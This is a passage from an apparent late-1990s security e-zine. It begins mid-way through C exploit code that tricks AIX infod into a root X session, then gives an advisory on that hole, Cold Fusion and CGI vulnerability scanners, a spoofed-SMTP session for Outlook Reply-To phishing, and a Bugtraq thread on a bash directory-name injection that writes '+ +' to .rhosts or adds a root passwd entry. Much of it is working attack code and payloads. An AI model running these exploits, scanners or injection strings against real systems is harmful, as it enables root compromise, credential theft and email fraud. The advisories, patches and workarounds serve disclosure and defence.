sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
fwrite(buffer,1,2,param);
/* DISPLAY (259) */
bzero(buffer,TAILLE_BUFFER);
strcpy(buffer,getenv("DISPLAY"));
fwrite(buffer,1,259,param);
/* LANG (1 C 0 0 0 0 0 0 0) */
sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
fwrite(buffer,1,9,param);
/* size_$HOME $HOME 0 0 0 */
send_environ(HOME,param);
/* size_$LOGNAME $LOGNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$USERNAME $USERNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$PWD $PWD 0 0 0 */
send_environ(PWD,param);
/* size_DISPLAY DISPLAY 0 0 0 */
//send_environ(ptsname(0),param);
/* If we send our pts, info_gr will crash as it has already changed UID */
send_environ("/dev/null",param);
/* It's probably not useful to copy all these environment vars but it was
good for debugging :) */
sprintf(buffer,"%c%c%c%c",23,0,0,0);
fwrite(buffer,1,4,param);
sprintf(buffer,"_=./startinfo");
send_environ(buffer,param);
sprintf(buffer,"TMPDIR=/tmp");
send_environ(buffer,param);
sprintf(buffer,"LANG=%s",getenv("LANG"));
send_environ(buffer,param);
sprintf(buffer,"LOGIN=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
send_environ(buffer,param);
sprintf(buffer,"PATH=%s",getenv("PATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","EDITOR=emacs");
send_environ(buffer,param);
sprintf(buffer,"LOGNAME=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","PS1=(exploited !) ");
send_environ(buffer,param);
sprintf(buffer,"USER=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
send_environ(buffer,param);
sprintf(buffer,"SHELL=%s",getenv("SHELL"));
send_environ(buffer,param);
sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
send_environ(buffer,param);
sprintf(buffer,"HOME=%s",HOME);
send_environ(buffer,param);
sprintf(buffer,"%s","TERM=vt220");
send_environ(buffer,param);
sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
send_environ(buffer,param);
sprintf(buffer,"PWD=%s",PWD);
send_environ(buffer,param);
sprintf(buffer,"%s","TZ=NFT-1");
send_environ(buffer,param);
sprintf(buffer,"%s","A__z=! LOGNAME");
send_environ(buffer,param);
/* Start info_gr with -q parameter or the process will be run locally and
not from the daemon ... */
sprintf(buffer,"%c%c%c%c",1,45,113,0);
fwrite(buffer,1,4,param);
fclose(param);
param=fopen("/tmp/tempo.fun","rb");
fseek(param,0,SEEK_END);
taille_param=ftell(param);
fseek(param,0,SEEK_SET);
fread(paramz,1,taille_param,param);
fclose(param);
unlink("/tmp/tempo.fun");
/* Thank you Mr daemon :) */
write(chaussette,paramz,taille_param);
printf("\n%s %s\n",OK,getenv("HOSTNAME"));
close(chaussette);
}
-------------------------------------------------------------------------
RSI.0011.11-12-98.AIX.INFOD
|:::. |::::: |::::. |::::: |::::: |::::.
.. :: .. .. :: .. .. .. ::
|:::: |:::: |:::: :::::: |::::: |:::: |:
|: :: |: |: |:: |: |: ::
|: :: |::::: |: |::::: |::::: |:::::
Repent Security Incorporated, RSI
[ http://www.repsec.com ]
*** RSI ALERT ADVISORY ***
--- [CREDIT] --------------------------------------------------------------
Andrew Green: Discovered the vulnerability
Mark Zielinski: Author of the advisory
--- [SUMMARY] -------------------------------------------------------------
Announced: November 09, 1998
Report code: RSI.0011.11-12-98.AIX.INFOD
Report title: AIX infod
Vulnerability: Please see the details section
Vendor status: AIX contacted on November 12, 1998
Patch status: IBM is currently working on several fixes
Platforms: AIX 3.2.x, 4.1.x, 4.2.x, 4.3.x
Reference: http://www.repsec.com/advisories.html
Impact: If exploited, an attacker could potentially compromise
root access locally on your server
--- [DETAILS] -------------------------------------------------------------
Description: The Info Explorer daemon is a AIX utility which is used
to provide documentation for the operating system and
associated programs.
Problem: The info daemon does not perform any validation on information
passed to the local socket that it is bound to. Users on the
system can send false information to the daemon and trick
it into spawning a connection to the intruders X display.
Details: By sending a UID and GID of 0, along with a false environment,
infod will be forced into spawning a connection with root
privileges to the intruder's X display.
Once the program appears on the screen, they can goto
the default options menu and change the printer command
line to an alternate binary such as /bin/sh that gives
privileges to the account the session was spawned under.
--- [FIX] -----------------------------------------------------------------
Solution: IBM is currently working on the following fixes which will be
available soon:
AIX 3.2.x: upgrade to version 4
AIX 4.1.x: IX84640
AIX 4.2.x: IX84641
AIX 4.3.x: IX84642
Until the fixes can be applied, the infod daemon should be disabled.
Run the following commands as root:
# stopsrc -s infod
# rmitab infod
# chown root.system /usr/lpp/info/bin/infod
# chmod 0 /usr/lpp/info/bin/infod
---------------------------------------------------------------------------
Repent Security Incorporated (RSI)
13610 N. Scottsdale Rd.
Suite #10-326
Scottsdale, AZ 85254
E-Mail: advise@repsec.com
FTP: ftp://ftp.repsec.com
WWW: http://www.repsec.com
---------------------------------------------------------------------------
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQCNAzU6dqAAAAEEAOHt9a5vevjD8ZjsEmncEbFp2U7aeqvPTcF/8FJMilgOVp75
dshXvZixHsYU7flgCNzA7wLIQPWBQBrweLG6dx9gE9e5Ca6yAJxZg8wNsi06tZfP
nvmvf6F/7xoWS5Ei4k3YKuzscxlyePNNKws6uUe2ZmwVoB+i3HHT44dOafMhAAUT
tBpSZXBTZWMgPGFkdmlzZUByZXBzZWMuY29tPg==
=ro8H
-----END PGP PUBLIC KEY BLOCK-----
Copyright November 1998 RepSec, Inc.
The information in this document is provided as a service to customers
of RepSec, Inc. Neither RepSec, Inc., nor any of it's employees, makes
any warranty, express or implied, or assumes any legal liability or
responsibility for the accuracy, completeness, or usefulness of any
information, apparatus, product, or process contained herein, or
represents that its use would not infringe any privately owned rights.
Reference herein to any specific commercial products, process, or
services by trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation or
favoring by RepSec, Inc. The views and opinions of authors express
herein do no necessarily state or reflect those of RepSec, Inc., and may
not be used for advertising or product endorsement purposes.
The material in this alert advisory may be reproduced and distributed,
without permission, in whole or in part, by other security incident
response teams (both commercial and non-commercial), provided the above
copyright is kept intact and due credit is given to RepSec, Inc.
This alert advisory may be reproduced and distributed, without
permission, in its entirety only, by any person provided such
reproduction and/or distribution is performed for non-commercial
purposes and with the intent of increasing the awareness of the Internet
community.
---------------------------------------------------------------------------
RepSec, Inc. are trademarks of RepSec, Inc. All other trademarks are
property of their respective holders.
@HWA
28.0 Cold Fusion vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
"Cold Fusion Application Server Advisory" dated 4.20.1999
you can find a copy of this advisory and all other
l0pht Security Advisories here:
http://www.l0pht.com/advisories.html
much of this program was blatently copied from the cgi scanner released about
a week ago, written by su1d sh3ll... I just want to give credit where credit
is due... this particular scanner was "written" (basically modified) by
hypoclear of lUSt - Linux Users Strike Today... I know that it is trivial to
check to see if a server is vulnerable, but I had fun doing this so who the
heck cares if I want to waste my time...
while I'm here I minds well give shout outs to:
Phrozen Phreak (fidonet rules)
Special K (you will never get rid of my start button ;-)
go powerpuff girls (he he) ;-)
compile: gcc -o coldscan coldscan.c
usage: coldscan host
tested on: IRIX Release 5.3 (this should compile on most *NIX systems though)
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cfbuff[1024];
char *cfpage[5];
char *cfname[5];
cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
cfname[1] = "openfile.cfm ";
cfname[2] = "displayopenedfile.cfm ";
cfname[3] = "exprcalc.cfm ";
if (argc<2)
{
printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
printf("\nusage - %s host \n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
printf("scanning...\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
while(count++ < 3)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cfname[count]);
for(numin=0;numin < 1024;numin++)
{
cfbuff[numin] = '\0';
}
send(sock, cfpage[count],strlen(cfpage[count]),0);
recv(sock, cfbuff, sizeof(cfbuff),0);
cgistr = strstr(cfbuff,foundmsg);
if( cgistr != NULL)
printf("Exists!\n");
else
printf("Not Found\n");
close(sock);
}
}
@HWA
29.0 Updated CGI scanner scans for vulnerable servers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Cgi Scan v3.0 - scans for vunerabil webbased servers */
/* Based on Ech0's cgi scanner - i thought it was crap :( */
/* Modified and re-written by v0rt-fu (### - undernet) */
/* Most of these can be exploited via www.anonymiser.com */
/* phf isnt allow - others havent been tested by should */
/* work. */
/* Considering this scans a server for 43 vunerabilities */
/* only those exploits found are shown so you can track */
/* what is actually happening */
/* Thanks to b|ueberry for helping me pull through the */
/* the hard times and made me continue to code :) */
/* v0rt-fu */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[50];
char *cginame[50];
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
buff[2] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[34] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[35] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[36] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[37] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[38] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[39] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[40] = "GET /search97.vts HTTP/1.0\n\n";
buff[41] = "GET /carbo.dll HTTP/1.0\n\n";
buff[42] = "GET /cgi-bin/fpexplore.exe HTTP/1.0\n\n";
buff[43] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
cginame[1] = "UnlG ";
cginame[2] = "phf ";
cginame[3] = "Count.cgi ";
cginame[4] = "test-cgi ";
cginame[5] = "nph-test-cgi ";
cginame[6] = "php.cgi ";
cginame[7] = "handler ";
cginame[8] = "webgais ";
cginame[9] = "websendmail ";
cginame[10] = "webdist.cgi ";
cginame[11] = "faxsurvey ";
cginame[12] = "htmlscript ";
cginame[13] = "pfdisplay ";
cginame[14] = "perl.exe ";
cginame[15] = "wwwboard.pl ";
cginame[16] = "www-sql ";
cginame[17] = "view-source ";
cginame[18] = "campas ";
cginame[19] = "aglimpse ";
cginame[20] = "man.sh ";
cginame[21] = "AT-admin.cgi ";
cginame[22] = "filemail.pl ";
cginame[23] = "maillist.pl ";
cginame[24] = "jj ";
cginame[25] = "info2www ";
cginame[26] = "files.pl ";
cginame[27] = "finger ";
cginame[28] = "bnbform.cgi ";
cginame[29] = "survey.cgi ";
cginame[30] = "AnyForm2 ";
cginame[31] = "textcounter.pl ";
cginame[32] = "classifields.cgi ";
cginame[33] = "environ.cgi ";
cginame[34] = "service.pwd ";
cginame[35] = "users.pwd ";
cginame[36] = "authors.pwd ";
cginame[37] = "administrators.pwd ";
cginame[38] = "args.bat ";
cginame[39] = "uploader.exe ";
cginame[40] = "search97.vts ";
cginame[41] = "carbo.dll ";
cginame[42] = "fpexplore.exe ";
cginame[43] = "openfile.cfm ";
if (argc<2)
{
printf("\n _ _ __ ___ _ _ _ _ __ ___ _ _ _ _ __ ___ _ _ ");
printf("\n( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( )");
printf("\n ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ");
printf("\n(_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_)");
printf("\n Presents");
printf("\n [ Cgi Scanner ]");
printf("\n v3.0");
printf("\n ### - undernet.org ");
printf("\n");
printf("\nUsage: ./cgi www.server.com\n");
printf("\n");
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n _ _ __ ___ _ _ _ _ __ ___ _ _ _ _ __ ___ _ _ ");
printf("\n( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( )");
printf("\n ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ");
printf("\n(_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_)");
printf("\n Presents");
printf("\n [ Cgi Scanner ]");
printf("\n v3.0");
printf("\n ### - undernet.org ");
printf("\n");
printf("\nCgi Scan v3.0");
printf("\n\nPress any key to continue\n\n");
getchar();
printf("\nReceiving Httpd Version\n\n");
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\nReceiving Cgi Details\n\n");
while(count++ < 43)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL) {
printf("%s :",cginame[count]);
printf(" Found\n");
}
}
printf("\nScan Complete\n\n");
printf("\nv0rt-fu -- ### undernet.org\n\n");
}
@HWA
30.0 MS Outlook, spoof yer reply-to address?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 20 Apr 1999 15:10:05 -0700
From: Nate Lawson <nate@root.org>
To: BUGTRAQ@netspace.org
Subject: Outlook 98 allows spoofing internal users
Problem: Outlook uses a sender's Reply-To address silently, allowing
a user to inadvertently send data to an Internet mail account
when intending to reply to an internal, trusted user.
Impact: Anyone on the Internet can spoof a trusted internal Exchange user
and get replies sent back to themself without the user knowing they
weren't responding to another internal user.
How to reproduce:
1. Spoof mail as an internal user with a Reply-To address claiming to be
an internal user, but an address of an Internet account, say hotmail.
2. Go into Outlook and read the mail. The mail looks like it was internally
generated but viewing the full Internet headers under View->Options
shows the bogus Reply-To header.
3. Hit Reply in Outlook. The To: field looks like it's going to a valid
internal user, but right clicking on it and choosing Properties shows
that the internal user it is sending the reply to is actually an Internet
address.
4. Enter some text and hit Send. Observe that the mail went to the attacker's
account, not the internal one.
A quick script:
{root 5:00pm} ~> telnet mail.example.com 25
Trying 10.20.2.5...
Connected to mail.example.com.
Escape character is '^]'.
220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
helo losebag
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<accounting@example.com>
250 OK - Recipient <accounting@example.com>
data
354 Send data. End with CRLF.CRLF
>From: Nate Lawson
To: Accounting
Reply To: Nate Lawson<intruder@hotmail.com>
Subject: important!
Please reply with the latest copy of our sales figures!
Thanks,
Nate
.
250 OK
quit
221 closing connection
Connection closed by foreign host.
Now, a reply to the email will go not to the trusted internal user Nate
Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.com>.
Worse, the user sees no indication that the mail is outward-bound! The
To: field on the reply simply shows "Nate Lawson", a valid internal user.
Affected programs: Only tested on Outlook 98
Known use of this bug to get confidential information: none yet
Suggested Fix: always show the full email address of any recipient that is
not local (i.e. username@example.com would be hidden but any instance of
user@hotmail.com would be shown)
Microsoft has been notified, but claimed this was a weakness in SMTP and
would not be fixed until a secure successor to SMTP is implemented. They
obviouly missed the point -- the error is not in that mail can be forged,
but that Outlook allows a user to respond to a message that looks local
and legitimate, but is actually destined for an outside address.
-Nate
-----------------------------------------------------------------------
Date: Sun, 25 Apr 1999 18:36:11 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@netspace.org
Subject: Re: Outlook 98 allows spoofing internal users
On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:
>
> Suggested Fix: always show the full email address of any recipient that is
> not local (i.e. username@example.com would be hidden but any instance of
> user@hotmail.com would be shown)
Yeah, like: I am user@aol.com and I'd like outlook to hide evilhacker@aol.com.
Outlook should not be hiding anything..
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | peter@attic.vuurwerk.nl |
nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
@HWA
31.0 Bash parsing vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 20 Apr 1999 21:25:47 -0400
From: Shadow <shadow@OPERATOR.ORG>
To: BUGTRAQ@netspace.org
Subject: Bash Bug
Figured while everyone was working with bash, I might as well make this
one public(I apologize if this is old news, apparently it hasnt been fixed
if so).
If a user creates a directory with a command like
mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute. I also did this with a passwd
file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to
the rhosts. Played with symlinks and a few other ways to see if perhaps
maybe the system could trip it if a user made the directory in say /tmp.
Granted it may be a long shot on the users part, the ability to do so is a
bad thing IMHO. This didnt seem to work on any of my BSD boxes.
shadow - CLE
-------------------------------------------------------------------------
Most Failure is due to giving up, not realizing how close to success you
were - Thomas Edison
-------------------------------------------------------------------------
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 13:10:52 +0200
From: Henrik Nordstrom <hno@HEM.PASSAGEN.SE>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
Parts/Attachments:
1 Shown 21 lines Text
2 Shown 20 lines Text
----------------------------------------
Shadow wrote:
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
> and someone cd's into said directory, either by accident, or whatever,
> then it will cause it to actually execute.
It is a vulnerability of the prompt parsing, or more specifically the \w
or \W prompt escapes for showing the current directory. These get parsed
before backquote parsing of the prompt string.
Workaround: Make sure the variable PS1 is set to something not including
the above escapes when cd'ing into directories with backquotes or $ as
part of their name.
Patch for bash-1.14.7 attached.
bug-bash@prep.ai.mit.edu has been notified.
--
Henrik Nordstrom
[ Part 2: "Attached Text" ]
--- parse.y.orig Thu Apr 22 11:53:01 1999
+++ parse.y Thu Apr 22 12:56:34 1999
@@ -2729,6 +2729,17 @@
#else
getwd (t_string);
#endif /* EFFICIENT */
+ if (strcspn(t_string, slashify_in_quotes) < strlen(t_string)) {
+ char t_string2[MAXPATHLEN];
+ int i, j;
+ for (i = 0, j = 0 ; t_string[i] && j < MAXPATHLEN - 2 ; i++) {
+ if (member(t_string[i], slashify_in_quotes))
+ t_string2[j++] = '\\';
+ t_string2[j++] = t_string[i];
+ }
+ t_string2[j] = '\0';
+ strcpy(t_string, t_string2);
+ }
if (c == 'W')
{
----------------------------------------------------------------------------
Date: Wed, 21 Apr 1999 20:39:48 EDT
From: Andy Church <achurch@DRAGONFIRE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
>Figured while everyone was working with bash, I might as well make this
>one public(I apologize if this is old news, apparently it hasnt been fixed
>if so).
>
>If a user creates a directory with a command like
>
>mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
>and someone cd's into said directory, either by accident, or whatever,
>then it will cause it to actually execute.
Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe. As a workaround, use `pwd`
in place of \w.
Tested with bash 1.14 (it's the only one I have handy).
--Andy Church
achurch@dragonfire.net
http://achurch.dragonfire.net/
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 03:18:48 +0200
From: Marc Lehmann <pcg@GOOF.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
>
> If a user creates a directory with a command like
>
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
It seems to me that this is related to the prompt string parsing. If yes,
then bash is not vulnerable unless configured to display the current
directory (correct me if the root of the problem is different).
Some additional notes:
- I was unable to reproduce this on my system, even when bash is configured
to display the current path in the prompt. (bash 2.02.1(1))
- The original example seemed to have too much whitespace. I used:
mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"
- PS1 was set to \h:\w\$
HTH
--
-----==- |
----==-- _ |
---==---(_)__ __ ____ __ Marc Lehmann +--
--==---/ / _ \/ // /\ \/ / pcg@goof.com |e|
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE --+
The choice of a GNU generation |
|
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 11:16:06 +0200
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
On Tue, 20 Apr 1999, Shadow wrote:
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
seem to be vulnerable. Anyway, there's a hope even for those who want to
stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"NSA GCHQ KGB CIA nuclear conspiration war weapon spy agent... Hi Echelon!"
----------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 00:02:57 +0300
From: Guy Cohen <guy@SPICE.ORG.IL>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
.| >If a user creates a directory with a command like
.| >
.| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
.| >
.| Just to clarify, this only happens if PS1 (the bash prompt) contains
.| \w or \W _and_ a prompt is displayed containing the bogus directory name.
.| This means unattended shell scripts are safe. As a workaround, use `pwd`
.| in place of \w.
.|
Unfortunately this is not true. here is why:
rush:/tmp> bash --version
GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.
rush:/tmp> bash
bash-2.03$ echo $PS1
\s-\v\$
bash-2.03$ cat ~/.rhosts
cat: /export/home/guy/.rhosts: No such file or directory
bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
bash-2.03$ cd \\\ \ /
bash-2.03$ cat /export/home/guy/.rhosts\
+ +
sh-2.03$
--
Guy Cohen <guy@spice.org.il>
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 17:43:24 -0400
From: Daniel Jacobowitz <drow@FALSE.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
On Fri, Apr 23, 1999 at 12:02:57AM +0300, Guy Cohen wrote:
> Unfortunately this is not true. here is why:
> rush:/tmp> bash --version
> GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
> Copyright 1998 Free Software Foundation, Inc.
> rush:/tmp> bash
> bash-2.03$ echo $PS1
> \s-\v\$
> bash-2.03$ cat ~/.rhosts
> cat: /export/home/guy/.rhosts: No such file or directory
> bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
> bash-2.03$ cd \\\ \ /
> bash-2.03$ cat /export/home/guy/.rhosts\
> + +
> sh-2.03$
That's a quoting error. Look at the mkdir command you typed, and
observe that the backticks are not escaped - thus even inside of ""
they are evaluated.
Witness:
$ ls /drow/.rh*
ls: /drow/.rh*: No such file or directory
$ echo $PS1
\$
$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
$ ls /drow/.rhosts\
/drow/.rhosts
It doesn't even get .rhosts right - there's a space at the end. You
told bash to make the directory:
`echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ `
Dan
/--------------------------------\ /--------------------------------\
| Daniel Jacobowitz |__| CMU, CS class of 2002 |
| Debian GNU/Linux Developer __ Part-Time Systems Programmer |
| dan@debian.org | | drow@cs.cmu.edu |
\--------------------------------/ \--------------------------------/
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 15:44:35 -0400
From: Chet Ramey <chet@NIKE.INS.CWRU.EDU>
Reply-To: chet@po.CWRU.Edu
To: BUGTRAQ@netspace.org
